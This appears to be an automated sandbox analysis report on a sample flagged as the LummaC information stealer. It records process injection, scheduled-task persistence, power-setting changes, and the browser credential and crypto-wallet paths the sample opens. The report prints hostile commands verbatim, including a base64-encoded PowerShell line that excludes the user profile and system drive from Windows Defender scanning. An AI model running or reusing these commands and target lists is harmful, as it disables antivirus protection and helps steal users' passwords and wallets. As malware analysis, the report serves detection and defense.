Code function: 0_2_00D161B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00D161B4

Encrypted powershell cmdline option found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded <#U9o0#> Add-MpPreference <#iuH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mVB5jvoc#> -Force <#C8V#>
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded <#U9o0#> Add-MpPreference <#iuH#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#mVB5jvoc#> -Force <#C8V#>			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Memory written: C:\Users\user\Desktop\setupx 1.exe1.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa=="
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajafuaoqbvadaaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbpahuasaajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbtafyaqga1agoadgbvagmaiwa+acaalqbgag8acgbjaguaiaa8acmaqwa4afyaiwa+aa=="	Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00CFF048
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00CFB007
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00CFF299
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00CFF334
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	0_2_00CFF5E6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00CFF587
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	0_2_00CFF6BB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00CFF7AD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	0_2_00CFF706
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	0_2_00CFF8B3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	0_2_00CFAB0C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	2_2_00CFF8B3
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00CFF048
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00CFB007
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00CFF299
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	2_2_00CFAB0C
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00CFF334
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	2_2_00CFF5E6
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00CFF587
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: EnumSystemLocalesW,	2_2_00CFF6BB
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00CFF7AD
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: GetLocaleInfoW,	2_2_00CFF706

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 0_2_00CEE6D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00CEE6D7

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Source: Amcache.hve.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1153830614.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1139527382.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: setupx 1.exe1.exe PID: 6848, type: MEMORYSTR
Source: Yara match	File source: 2.2.setupx 1.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.setupx 1.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2253160823.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1082664009.0000000002D39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"WL!
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: h\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0H"
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: e.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t"
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: setupx 1.exe1.exe, 00000002.00000003.1109274613.0000000000FA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
